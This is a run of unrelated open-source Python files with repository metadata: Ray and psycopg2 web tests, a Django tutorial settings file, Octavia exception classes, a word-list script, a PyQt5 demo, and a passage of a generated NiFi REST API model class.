9322f6aab53f4ca5baf5a3573e1ffde12feae519
|
[
"Apache-2.0"
] | 1
|
2021-11-20T14:19:48.000Z
|
2021-11-20T14:19:48.000Z
|
from ray.tests.conftest import * # noqa
import pytest
from ray.experimental import workflow
from ray.experimental.workflow.common import WorkflowRef
@workflow.step
def incr(x):
return x + 1
def test_dynamic_workflow_ref(workflow_start_regular_shared):
# This test also shows different "style" of running workflows.
first_step = incr.step(0)
assert first_step.run("test_dynamic_workflow_ref") == 1
second_step = incr.step(WorkflowRef(first_step.id))
assert second_step.run("test_dynamic_workflow_ref") == 2
if __name__ == "__main__":
import sys
sys.exit(pytest.main(["-v", __file__]))
| 26
| 66
| 0.74359
|
16e2d05df23018e0d9ed127209240b6402915cf2
| 1,492
|
py
|
Python
|
tests/test_psycopg2.py
|
skriems/cherrypy-recipes
|
730188ce01511e81263b4c9645e2aa43533dbef8
|
[
"MIT"
] | null | null | null |
tests/test_psycopg2.py
|
skriems/cherrypy-recipes
|
730188ce01511e81263b4c9645e2aa43533dbef8
|
[
"MIT"
] | null | null | null |
tests/test_psycopg2.py
|
skriems/cherrypy-recipes
|
730188ce01511e81263b4c9645e2aa43533dbef8
|
[
"MIT"
] | null | null | null |
from psycopg2_app import create_app
import pytest
import webtest
@pytest.fixture(scope='module')
def app():
return webtest.TestApp(create_app())
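# CRUD round trip against the example app's /create, /read, /update and /delete
# endpoints; each test checks the HTTP status code and the JSON payload.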
class Testing(object):
def test_create(self, app):
resp = app.get('/create?name=test')
assert resp.status == '201 Created'
assert resp.headers['Content-Type'] == 'application/json'
assert resp.json['status'] == 'Created'
def test_read(self, app):
resp = app.get('/read/')
assert resp.status == '200 OK'
assert resp.headers['Content-Type'] == 'application/json'
assert isinstance(resp.json, list), 'list of records'
assert len(resp.json) == 1
assert resp.json[0] == dict(id=1, name='test')
def test_update(self, app):
resp = app.get('/update?name=test&newname=testing')
assert resp.status == '202 Accepted'
assert resp.headers['Content-Type'] == 'application/json'
assert resp.json['status'] == 'Accepted'
resp = app.get('/read')
assert isinstance(resp.json, list), 'list of records'
assert len(resp.json) == 1
assert resp.json[0] == dict(id=1, name='testing')
def test_delete(self, app):
resp = app.get('/delete?name=testing')
assert resp.status == '202 Accepted'
assert resp.headers['Content-Type'] == 'application/json'
resp = app.get('/read')
assert isinstance(resp.json, list), 'list of records'
assert len(resp.json) == 0
| 33.909091
| 65
| 0.613941
|
23a5d37e1c0a80c36dab215138c77e732d96887c
| 2,108
|
py
|
Python
|
2014-09-22-como-trabalhar-com-ajax-no-django/django_ajax_example/settings.py
|
vitorfs/blog-code-snippets
|
bdb88ba16d918f4a68ad7bfe1619110a8ee6614f
|
[
"MIT"
] | 3
|
2019-01-22T21:39:45.000Z
|
2021-09-11T14:22:15.000Z
|
2014-09-22-como-trabalhar-com-ajax-no-django/django_ajax_example/settings.py
|
vitorfs/blog-code-snippets
|
bdb88ba16d918f4a68ad7bfe1619110a8ee6614f
|
[
"MIT"
] | null | null | null |
2014-09-22-como-trabalhar-com-ajax-no-django/django_ajax_example/settings.py
|
vitorfs/blog-code-snippets
|
bdb88ba16d918f4a68ad7bfe1619110a8ee6614f
|
[
"MIT"
] | 2
|
2015-09-20T20:22:06.000Z
|
2021-09-11T14:22:16.000Z
|
"""
Django settings for django_ajax_example project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(__file__)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(18xhn+e$7i35bplgtk$9u60kf^y9wy5zbc=!sdk=xshsia+hp'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_ajax_example.core',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'django_ajax_example.urls'
WSGI_APPLICATION = 'django_ajax_example.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_DIRS = (
os.path.join(BASE_DIR, 'templates'),
)
print TEMPLATE_DIRS
| 23.685393
| 71
| 0.737666
|
6bb31e2c807fb2d8a4e386176a928a5385f59724
| 9,855
|
py
|
Python
|
octavia/common/exceptions.py
|
acdc-cloud/openstack-octavia
|
f68460ddd31f9b09d59fff876f103324078473a6
|
[
"Apache-2.0"
] | null | null | null |
octavia/common/exceptions.py
|
acdc-cloud/openstack-octavia
|
f68460ddd31f9b09d59fff876f103324078473a6
|
[
"Apache-2.0"
] | null | null | null |
octavia/common/exceptions.py
|
acdc-cloud/openstack-octavia
|
f68460ddd31f9b09d59fff876f103324078473a6
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2011 VMware, Inc, 2014 A10 Networks
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Octavia base exception handling.
"""
import six
from oslo_utils import excutils
from webob import exc
from octavia.i18n import _
class OctaviaException(Exception):
"""Base Octavia Exception.
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
orig_msg = None
orig_code = None
def __init__(self, *args, **kwargs):
try:
if args:
self.message = args[0]
self.orig_msg = kwargs.get('orig_msg')
self.orig_code = kwargs.get('orig_code')
super(OctaviaException, self).__init__(self.message % kwargs)
self.msg = self.message % kwargs
except Exception:
with excutils.save_and_reraise_exception() as ctxt:
if not self.use_fatal_exceptions():
ctxt.reraise = False
# at least get the core message out if something happened
super(OctaviaException, self).__init__(self.message)
def __unicode__(self):
return six.text_type(self.msg)
@staticmethod
def use_fatal_exceptions():
return False
# NOTE(blogan) Using webob exceptions here because WSME exceptions are very
# limited at this point and they do not work well in _lookup methods in the
# controllers
class APIException(exc.HTTPClientError):
msg = "Something unknown went wrong"
code = 500
def __init__(self, **kwargs):
self.msg = self.msg % kwargs
super(APIException, self).__init__(detail=self.msg)
class NotFound(APIException):
msg = _('%(resource)s %(id)s not found.')
code = 404
class PolicyForbidden(APIException):
msg = _("Policy does not allow this request to be performed.")
code = 403
class InvalidOption(APIException):
msg = _("%(value)s is not a valid option for %(option)s")
code = 400
class InvalidFilterArgument(APIException):
msg = "One or more arguments are either duplicate or invalid"
code = 400
class DisabledOption(APIException):
msg = _("The selected %(option)s is not allowed in this deployment: "
"%(value)s")
code = 400
class L7RuleValidation(APIException):
msg = _("Error parsing L7Rule: %(error)s")
code = 400
class SingleCreateDetailsMissing(APIException):
msg = _("Missing details for %(type)s object: %(name)s")
code = 400
class InvalidHMACException(OctaviaException):
message = _("HMAC hashes didn't match")
class MissingArguments(OctaviaException):
message = _("Missing arguments.")
class NetworkConfig(OctaviaException):
message = _("Unable to allocate network resource from config")
class NeedsPassphrase(OctaviaException):
message = _("Passphrase needed to decrypt key but client "
"did not provide one.")
class UnreadableCert(OctaviaException):
message = _("Could not read X509 from PEM")
class MisMatchedKey(OctaviaException):
message = _("Key and x509 certificate do not match")
class CertificateRetrievalException(APIException):
msg = _('Could not retrieve certificate: %(ref)s')
code = 400
class CertificateStorageException(OctaviaException):
message = _('Could not store certificate: %(msg)s')
class CertificateGenerationException(OctaviaException):
message = _('Could not sign the certificate request: %(msg)s')
class DuplicateListenerEntry(APIException):
msg = _("Another Listener on this Load Balancer "
"is already using protocol_port %(port)d")
code = 409
class DuplicateMemberEntry(APIException):
msg = _("Another member on this pool is already using ip %(ip_address)s "
"on protocol_port %(port)d")
code = 409
class DuplicateHealthMonitor(APIException):
msg = _("This pool already has a health monitor")
code = 409
class DuplicatePoolEntry(APIException):
msg = _("This listener already has a default pool")
code = 409
class PoolInUseByL7Policy(APIException):
msg = _("Pool %(id)s is in use by L7 policy %(l7policy_id)s")
code = 409
class ImmutableObject(APIException):
msg = _("%(resource)s %(id)s is immutable and cannot be updated.")
code = 409
class LBPendingStateError(APIException):
msg = _("Invalid state %(state)s of loadbalancer resource %(id)s")
code = 409
class TooManyL7RulesOnL7Policy(APIException):
msg = _("Too many rules on L7 policy %(id)s")
code = 409
class ComputeBuildException(OctaviaException):
message = _("Failed to build compute instance due to: %(fault)s")
class ComputeBuildQueueTimeoutException(OctaviaException):
message = _('Failed to get an amphora build slot.')
class ComputeDeleteException(OctaviaException):
message = _('Failed to delete compute instance.')
class ComputeGetException(OctaviaException):
message = _('Failed to retrieve compute instance.')
class ComputeStatusException(OctaviaException):
message = _('Failed to retrieve compute instance status.')
class ComputeGetInterfaceException(OctaviaException):
message = _('Failed to retrieve compute virtual interfaces.')
class IDAlreadyExists(APIException):
msg = _('Already an entity with that specified id.')
code = 409
class NoReadyAmphoraeException(OctaviaException):
message = _('There are not any READY amphora available.')
class GlanceNoTaggedImages(OctaviaException):
message = _("No Glance images are tagged with %(tag)s tag.")
# This is an internal use exception for the taskflow work flow
# and will not be exposed to the customer. This means it is a
# normal part of operation while waiting for compute to go active
# on the instance
class ComputeWaitTimeoutException(OctaviaException):
message = _('Waiting for compute id %(id)s to go active timeout.')
class InvalidTopology(OctaviaException):
message = _('Invalid topology specified: %(topology)s')
# L7 policy and rule exceptions
class InvalidL7PolicyAction(APIException):
msg = _('Invalid L7 Policy action specified: %(action)s')
code = 400
class InvalidL7PolicyArgs(APIException):
msg = _('Invalid L7 Policy arguments: %(msg)s')
code = 400
class InvalidURL(OctaviaException):
message = _('Not a valid URL: %(url)s')
class InvalidURLPath(APIException):
msg = _('Not a valid URLPath: %(url_path)s')
code = 400
class InvalidString(OctaviaException):
message = _('Invalid characters in %(what)s')
class InvalidRegex(OctaviaException):
message = _('Unable to parse regular expression: %(e)s')
class InvalidL7Rule(OctaviaException):
message = _('Invalid L7 Rule: %(msg)s')
class ServerGroupObjectCreateException(OctaviaException):
message = _('Failed to create server group object.')
class ServerGroupObjectDeleteException(OctaviaException):
message = _('Failed to delete server group object.')
class InvalidAmphoraOperatingSystem(OctaviaException):
message = _('Invalid amphora operating system: %(os_name)s')
class QuotaException(APIException):
msg = _('Quota has been met for resources: %(resource)s')
code = 403
class ProjectBusyException(APIException):
msg = _('Project busy. Unable to lock the project. Please try again.')
code = 503
class MissingProjectID(OctaviaException):
message = _('Missing project ID in request where one is required.')
class MissingAPIProjectID(APIException):
message = _('Missing project ID in request where one is required.')
code = 400
class InvalidSubresource(APIException):
msg = _('%(resource)s %(id)s not found.')
code = 400
class ValidationException(APIException):
msg = _('Validation failure: %(detail)s')
code = 400
class VIPValidationException(APIException):
msg = _('Validation failure: VIP must contain one of: %(objects)s.')
code = 400
class InvalidSortKey(APIException):
msg = _("Supplied sort key '%(key)s' is not valid.")
code = 400
class InvalidSortDirection(APIException):
msg = _("Supplied sort direction '%(key)s' is not valid.")
code = 400
class InvalidMarker(APIException):
msg = _("Supplied pagination marker '%(key)s' is not valid.")
code = 400
class InvalidLimit(APIException):
msg = _("Supplied pagination limit '%(key)s' is not valid.")
code = 400
class MissingVIPSecurityGroup(OctaviaException):
message = _('VIP security group is missing for load balancer: %(lb_id)s')
class ProviderNotEnabled(APIException):
msg = _("Provider '%(prov)s' is not enabled.")
code = 400
class ProviderNotFound(APIException):
msg = _("Provider '%(prov)s' was not found.")
code = 501
class ProviderDriverError(APIException):
msg = _("Provider '%(prov)s' reports error: %(user_msg)s")
code = 500
class ProviderNotImplementedError(APIException):
msg = _("Provider '%(prov)s' does not support a requested action: "
"%(user_msg)s")
code = 501
class ProviderUnsupportedOptionError(APIException):
msg = _("Provider '%(prov)s' does not support a requested option: "
"%(user_msg)s")
code = 501
| 26.92623
| 78
| 0.69934
|
1a3ee24010a46a1439a5ea25e1f1de24f44eea56
| 462
|
py
|
Python
|
fiz/dataset/integrate2.py
|
20x48/fiz
|
33972ed846d47418a2bc07d06a23277d6d53aeab
|
[
"MIT"
] | null | null | null |
fiz/dataset/integrate2.py
|
20x48/fiz
|
33972ed846d47418a2bc07d06a23277d6d53aeab
|
[
"MIT"
] | null | null | null |
fiz/dataset/integrate2.py
|
20x48/fiz
|
33972ed846d47418a2bc07d06a23277d6d53aeab
|
[
"MIT"
] | null | null | null |
# Doesn't it feel uncomfortable that there isn't a single `import` at the top of this file?
# If you have the option, run this with PyPy.
result = set()
with open('words_alpha.txt', encoding='utf-8') as f:
for word in f.read().splitlines():
result.add(word)
with open('out.txt', 'wb') as f:
for word in sorted(result):
if len(word) >= 5: # Filter the words!
try:
f.write(word.encode('ascii'))
f.write(b'\n')
except Exception as e:
print(e, word)
exit()
| 25.666667
| 52
| 0.508658
|
1c09ec3a892a3069c775c84e98c5411b505906e5
| 946
|
py
|
Python
|
Unidad_03/Uni3_lab_05_diccionarios.py
|
Fundamentos-de-Informatica-Python/fund-info-py
|
60c64f1ae29b833abc5a395361814c15472c0c11
|
[
"Apache-2.0"
] | 1
|
2022-03-31T12:45:42.000Z
|
2022-03-31T12:45:42.000Z
|
Unidad_03/Uni3_lab_05_diccionarios.py
|
Fundamentos-de-Informatica-Python/fund-info-py
|
60c64f1ae29b833abc5a395361814c15472c0c11
|
[
"Apache-2.0"
] | 1
|
2022-03-21T02:22:30.000Z
|
2022-03-21T02:22:30.000Z
|
Unidad_03/Uni3_lab_05_diccionarios.py
|
Fundamentos-de-Informatica-Python/fund-info-py
|
60c64f1ae29b833abc5a395361814c15472c0c11
|
[
"Apache-2.0"
] | null | null | null |
# UNIT 03.D28 - D29
# Dictionaries
print('\n\n---[Diapo 27]---------------------')
print('Diccionarios e Iteraciones:')
diccio = {
'naranja': 'orange',
'manzana': 'apple',
'pera': 'pear'
}
print('Se imprimen las claves: ')
for fruta in diccio:
print(fruta)
print('Se imprime con clave, valores: ')
for fruta in diccio:
print(fruta, ' ->', diccio[fruta])
print('Se imprime con clave, valores: ')
for clave, valor in diccio.items():
print(clave, ' ->', valor)
print('\n\n---[Diapo 28]---------------------')
print('Stock en mi kiosco:')
articulos = []
articulo = {'nombre': 'chicle', 'precio': 10, 'stock': 1500}
articulos.append(articulo)
articulo = {'nombre': 'alfajor', 'precio': 40, 'stock': 300}
articulos.append(articulo)
articulo = {'nombre': 'caramelo', 'precio': 2, 'stock': 10000}
articulos.append(articulo)
for art in articulos:
print(art['nombre'], '$', art['precio'], 'stock: ', art['stock'])
| 22.52381
| 69
| 0.604651
|
e22c5d25fe2359a185e4a819d945a39a7c16462f
| 4,186
|
py
|
Python
|
Conputional_Genonics/Assignment/assignment2/sample_solution/snv_caller/caller_strategies.py
|
infinityglow/Unimelb-CS-Subjects
|
07bdb49fd4c50035b7f2e80ca218ac2b620098e4
|
[
"MIT"
] | 1
|
2022-02-14T16:31:07.000Z
|
2022-02-14T16:31:07.000Z
|
Conputional_Genonics/Assignment/assignment2/sample_solution/snv_caller/caller_strategies.py
|
hidara2000/Unimelb-CS-Subjects
|
07bdb49fd4c50035b7f2e80ca218ac2b620098e4
|
[
"MIT"
] | null | null | null |
Conputional_Genonics/Assignment/assignment2/sample_solution/snv_caller/caller_strategies.py
|
hidara2000/Unimelb-CS-Subjects
|
07bdb49fd4c50035b7f2e80ca218ac2b620098e4
|
[
"MIT"
] | 1
|
2021-06-14T11:59:13.000Z
|
2021-06-14T11:59:13.000Z
|
from Bio import SeqIO, Seq
import re
import itertools
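# SubReference wraps a slice of a FASTA reference: the record label is expected to
# look like "<name>:<start>-<end>" and is converted to zero-based coordinates, so
# indexing or slicing the object maps genomic positions onto the stored sequence.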
class SubReference():
def __init__(self,reference_file):
reference = next(SeqIO.parse(reference_file,'fasta'))
(self.reference_name,self.min_pos,self.max_pos) = self._parse_label(reference.name)
self._reference_seq = reference.seq
def is_valid_pos(self,pos):
return self.min_pos <= pos < self.max_pos
def _parse_label(self,label):
result = re.match('(?P<ref>\w*):(?P<min>\d*)-(?P<max>\d*)', label)
zero_based_min = int(result.group('min'))-1
zero_based_max = int(result.group('max'))-1
return (result.group('ref'),zero_based_min,zero_based_max)
def __getitem__(self,sliceobj):
sliced_bases = None
if isinstance(sliceobj, int):
sliced_bases= self._reference_seq[sliceobj-self.min_pos]
elif isinstance(sliceobj, slice):
new_slice = slice(sliceobj.start-self.min_pos,sliceobj.stop-self.min_pos,sliceobj.step)
sliced_bases= self._reference_seq[new_slice]
else:
raise TypeError
return sliced_bases.upper()
def __len__(self):
return self.max_pos+1
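# HeterozygoteStrategy only reports a position when at least two bases have an
# observed frequency between 0.2 and 0.8, i.e. a putative heterozygous site.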
class HeterozygoteStrategy():
def __call__(self,pileupcolumn,base_probs):
filtered_bases = self._heterogeneous_bases(base_probs)
if len(filtered_bases.keys()) < 2:
filtered_bases = {}
return filtered_bases
def format_output(self,reference_name, pos, called_snvs):
output = ''
for base, stats in called_snvs.iteritems():
output += self._format(reference_name,str(pos),base,stats['prob'],stats['avg'])
return output
def _heterogeneous_bases(self,base_probs):
return dict((base,probs)for base, probs in base_probs.iteritems() if probs['prob'] >= 0.2 and probs['prob'] <= 0.8)
def _format(self,reference, pos, base,prob,avg):
return "{reference}\t{pos}\t{base}\t{prob}\t{avg}\n".format(reference=reference,pos=pos,base=base,prob=prob,avg=avg)
class ReferenceStrategy():
def __init__(self,reference_obj):
self.reference = reference_obj
self._written_header = False
def __call__(self,pileupcolumn,base_probs, frequency_cutoff=0.2):
filtered_probs = {}
reference_pos = pileupcolumn.pos
if self.reference.is_valid_pos(reference_pos):
reference_base = self.reference[reference_pos]
for base,probs in base_probs.iteritems():
if probs['prob'] >= frequency_cutoff:
filtered_probs[base]=probs
if not any(map(lambda base_tuple: base_tuple[0] != reference_base,filtered_probs)):
filtered_probs = {}
return filtered_probs
def format_output(self,reference_name, pos, called_snvs):
if not any(called_snvs):
return ''
output = ''
if not self._written_header:
self._written_header = True
output+= '#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\tSAMPLE\n'
chrom_num = re.search('\d+',reference_name).group(0)
ref = self.reference[pos]
alts = []
freqs = []
quals = []
for base, stats in sorted(called_snvs.iteritems(),key=lambda base_tuple: base_tuple[0]):
if base != ref:
alts.append(base)
freqs.append(stats['prob'])
quals.append(stats['avg'])
all_found_bases = called_snvs.keys()
genotypes = self._format_genotypes(all_found_bases,ref,alts)
output += self._format(chrom_num,pos,ref,alts,quals,freqs,genotypes)
return output
def _format_genotypes(self,all_found_bases,ref,alts):
positions = []
for base in all_found_bases:
if base == ref:
positions.append(str(0))
else:
positions.append(str(alts.index(base)+1))
if len(positions) == 1:
return '{}/{}'.format(positions[0],positions[0])
else:
return ','.join(map(lambda x: '/'.join(sorted(x)),itertools.combinations(positions,2)))
def _format(self,chrom_num,pos,ref,alts,quals,freqs,sample,identifier='.',filt='PASS',form='GT'):
info = 'AF={}'.format(','.join(map(lambda x: str(x),freqs)))
alt = ','.join(alts)
return '{chrom_num}\t{pos}\t{id}\t{ref}\t{alt}\t{qual}\t{filter}\t{info}\t{format}\t{sample}\n'\
.format(chrom_num=chrom_num,pos=pos,id=identifier,ref=ref,alt=alt,qual=quals[0],filter=filt,info=info,format=form,sample=sample)
| 36.086207
| 134
| 0.688247
|
b03fc8c96fa1e01b13ada555b8fb38f1b961edd8
| 1,248
|
py
|
Python
|
tests/old_suite/interactive/test_pyqt5.py
|
yoda-vid/pyinstaller
|
419f349dad721a253b19d9c596e251818132d6ba
|
[
"Apache-2.0"
] | 2
|
2017-02-08T22:22:09.000Z
|
2020-10-08T12:28:36.000Z
|
tests/old_suite/interactive/test_pyqt5.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 3
|
2020-04-06T15:48:37.000Z
|
2021-03-23T10:22:21.000Z
|
tests/old_suite/interactive/test_pyqt5.py
|
416426/pyinstaller
|
0f2b2e921433ab5a510c7efdb21d9c1d7cfbc645
|
[
"Apache-2.0"
] | 4
|
2018-06-04T20:40:37.000Z
|
2020-10-13T22:38:40.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2013-2021, PyInstaller Development Team.
#
# Distributed under the terms of the GNU General Public License (version 2
# or later) with exception for distributing the bootloader.
#
# The full license is in the file COPYING.txt, distributed with this software.
#
# SPDX-License-Identifier: (GPL-2.0-or-later WITH Bootloader-exception)
#-----------------------------------------------------------------------------
import sys
from PyQt5 import Qt
from PyQt5 import QtCore
from PyQt5 import QtGui
from PyQt5 import QtWidgets
def main():
app = QtWidgets.QApplication(sys.argv)
read_formats = ', '.join(str(fmt).lower()
for fmt in QtGui.QImageReader.supportedImageFormats())
print("Qt5 plugin paths: " + str(list(app.libraryPaths())))
print("Qt5 image read support: " + read_formats)
print('Qt5 Libraries path: ' +
str(QtCore.QLibraryInfo.location(QtCore.QLibraryInfo.LibrariesPath)))
label = QtWidgets.QLabel("Hello World from PyQt5", None)
label.setWindowTitle("Hello World from PyQt5")
label.resize(300, 300)
label.show()
app.exec_()
if __name__ == "__main__":
main()
| 32.842105
| 81
| 0.619391
|
89589edc7eb65d6549b33ac352eeab4e5e039e21
| 1,740
|
py
|
Python
|
test/test_project.py
|
LuJie0403/iterlife-pybase
|
d85444826365677938c58dc68bf7d30516f02e4d
|
[
"MIT"
] | 89
|
2018-05-31T06:51:36.000Z
|
2022-02-21T06:16:36.000Z
|
test/test_project.py
|
LuJie0403/iterlife-pybase
|
d85444826365677938c58dc68bf7d30516f02e4d
|
[
"MIT"
] | 235
|
2018-05-21T03:32:37.000Z
|
2021-07-20T08:45:09.000Z
|
test/test_project.py
|
LuJie0403/iterlife-pybase
|
d85444826365677938c58dc68bf7d30516f02e4d
|
[
"MIT"
] | 20
|
2018-05-29T14:26:13.000Z
|
2022-02-21T06:16:50.000Z
|
# coding=utf-8
import os
import shutil
import pytest
from fishbase.fish_project import init_project_by_yml
# 2018.6.27 v1.0.14 #73 created by Jia ChunYing
class TestProject(object):
# 2021.6.22, #294, fix minor errors
def test_load_bad_01(self):
"""
empty file
"""
base_dir = os.path.dirname(os.path.abspath(__file__))
target_file = base_dir + os.sep + 'test_project_with_empty_file.yaml'
with open(target_file, 'wb') as f:
f.close()
with pytest.raises(KeyError) as e:
init_project_by_yml(target_file, '.')
exec_msg = e.value.args[0]
assert exec_msg == 'project config format Error: fail to load'
# os.remove(target_file)
def test_init_project_by_yml(self):
# define yml string
package_yml = '''
project: hellopackage
tree:
- README.md
- requirements.txt
- setup.py
- MANIFEST.in
- hellopackage: # project name
- __init__.py
- test: # unittest file
- __init__.py
- demo: # usage demo
- __init__.py
- doc: # documents
'''
# init project by yml
init_project_by_yml(package_yml, '.')
result = os.listdir('./hellopackage')
expect = ['demo', 'requirements.txt', 'test', 'MANIFEST.in', 'hellopackage', 'README.md', 'setup.py', 'doc']
for ele in expect:
assert ele in result
# remove the temporary files
shutil.rmtree('./hellopackage')
| 32.222222
| 116
| 0.506322
|
2036caa325f480ed36b0e7154890d44d049798a1
| 13,619
|
py
|
Python
|
nipyapi/nifi/models/listing_request_dto.py
|
Paul-Verardi/nipyapi
|
7a709611d9cf30e4ce8943db4d4dd617f2f7c81c
|
[
"Apache-2.0"
] | null | null | null |
nipyapi/nifi/models/listing_request_dto.py
|
Paul-Verardi/nipyapi
|
7a709611d9cf30e4ce8943db4d4dd617f2f7c81c
|
[
"Apache-2.0"
] | 1
|
2018-11-13T21:01:33.000Z
|
2018-11-13T21:01:33.000Z
|
nipyapi/nifi/models/listing_request_dto.py
|
Paul-Verardi/nipyapi
|
7a709611d9cf30e4ce8943db4d4dd617f2f7c81c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
NiFi Rest Api
The Rest Api provides programmatic access to command and control a NiFi instance in real time. Start and stop processors, monitor queues, query provenance data, and more. Each endpoint below includes a description, definitions of the expected input and output, potential response codes, and the authorizations required to invoke each service.
OpenAPI spec version: 1.7.1
Contact: dev@nifi.apache.org
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class ListingRequestDTO(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'uri': 'str',
'submission_time': 'str',
'last_updated': 'str',
'percent_completed': 'int',
'finished': 'bool',
'failure_reason': 'str',
'max_results': 'int',
'state': 'str',
'queue_size': 'QueueSizeDTO',
'flow_file_summaries': 'list[FlowFileSummaryDTO]',
'source_running': 'bool',
'destination_running': 'bool'
}
attribute_map = {
'id': 'id',
'uri': 'uri',
'submission_time': 'submissionTime',
'last_updated': 'lastUpdated',
'percent_completed': 'percentCompleted',
'finished': 'finished',
'failure_reason': 'failureReason',
'max_results': 'maxResults',
'state': 'state',
'queue_size': 'queueSize',
'flow_file_summaries': 'flowFileSummaries',
'source_running': 'sourceRunning',
'destination_running': 'destinationRunning'
}
def __init__(self, id=None, uri=None, submission_time=None, last_updated=None, percent_completed=None, finished=None, failure_reason=None, max_results=None, state=None, queue_size=None, flow_file_summaries=None, source_running=None, destination_running=None):
"""
ListingRequestDTO - a model defined in Swagger
"""
self._id = None
self._uri = None
self._submission_time = None
self._last_updated = None
self._percent_completed = None
self._finished = None
self._failure_reason = None
self._max_results = None
self._state = None
self._queue_size = None
self._flow_file_summaries = None
self._source_running = None
self._destination_running = None
if id is not None:
self.id = id
if uri is not None:
self.uri = uri
if submission_time is not None:
self.submission_time = submission_time
if last_updated is not None:
self.last_updated = last_updated
if percent_completed is not None:
self.percent_completed = percent_completed
if finished is not None:
self.finished = finished
if failure_reason is not None:
self.failure_reason = failure_reason
if max_results is not None:
self.max_results = max_results
if state is not None:
self.state = state
if queue_size is not None:
self.queue_size = queue_size
if flow_file_summaries is not None:
self.flow_file_summaries = flow_file_summaries
if source_running is not None:
self.source_running = source_running
if destination_running is not None:
self.destination_running = destination_running
@property
def id(self):
"""
Gets the id of this ListingRequestDTO.
The id for this listing request.
:return: The id of this ListingRequestDTO.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this ListingRequestDTO.
The id for this listing request.
:param id: The id of this ListingRequestDTO.
:type: str
"""
self._id = id
@property
def uri(self):
"""
Gets the uri of this ListingRequestDTO.
The URI for future requests to this listing request.
:return: The uri of this ListingRequestDTO.
:rtype: str
"""
return self._uri
@uri.setter
def uri(self, uri):
"""
Sets the uri of this ListingRequestDTO.
The URI for future requests to this listing request.
:param uri: The uri of this ListingRequestDTO.
:type: str
"""
self._uri = uri
@property
def submission_time(self):
"""
Gets the submission_time of this ListingRequestDTO.
The timestamp when the query was submitted.
:return: The submission_time of this ListingRequestDTO.
:rtype: str
"""
return self._submission_time
@submission_time.setter
def submission_time(self, submission_time):
"""
Sets the submission_time of this ListingRequestDTO.
The timestamp when the query was submitted.
:param submission_time: The submission_time of this ListingRequestDTO.
:type: str
"""
self._submission_time = submission_time
@property
def last_updated(self):
"""
Gets the last_updated of this ListingRequestDTO.
The last time this listing request was updated.
:return: The last_updated of this ListingRequestDTO.
:rtype: str
"""
return self._last_updated
@last_updated.setter
def last_updated(self, last_updated):
"""
Sets the last_updated of this ListingRequestDTO.
The last time this listing request was updated.
:param last_updated: The last_updated of this ListingRequestDTO.
:type: str
"""
self._last_updated = last_updated
@property
def percent_completed(self):
"""
Gets the percent_completed of this ListingRequestDTO.
The current percent complete.
:return: The percent_completed of this ListingRequestDTO.
:rtype: int
"""
return self._percent_completed
@percent_completed.setter
def percent_completed(self, percent_completed):
"""
Sets the percent_completed of this ListingRequestDTO.
The current percent complete.
:param percent_completed: The percent_completed of this ListingRequestDTO.
:type: int
"""
self._percent_completed = percent_completed
@property
def finished(self):
"""
Gets the finished of this ListingRequestDTO.
Whether the query has finished.
:return: The finished of this ListingRequestDTO.
:rtype: bool
"""
return self._finished
@finished.setter
def finished(self, finished):
"""
Sets the finished of this ListingRequestDTO.
Whether the query has finished.
:param finished: The finished of this ListingRequestDTO.
:type: bool
"""
self._finished = finished
@property
def failure_reason(self):
"""
Gets the failure_reason of this ListingRequestDTO.
The reason, if any, that this listing request failed.
:return: The failure_reason of this ListingRequestDTO.
:rtype: str
"""
return self._failure_reason
@failure_reason.setter
def failure_reason(self, failure_reason):
"""
Sets the failure_reason of this ListingRequestDTO.
The reason, if any, that this listing request failed.
:param failure_reason: The failure_reason of this ListingRequestDTO.
:type: str
"""
self._failure_reason = failure_reason
@property
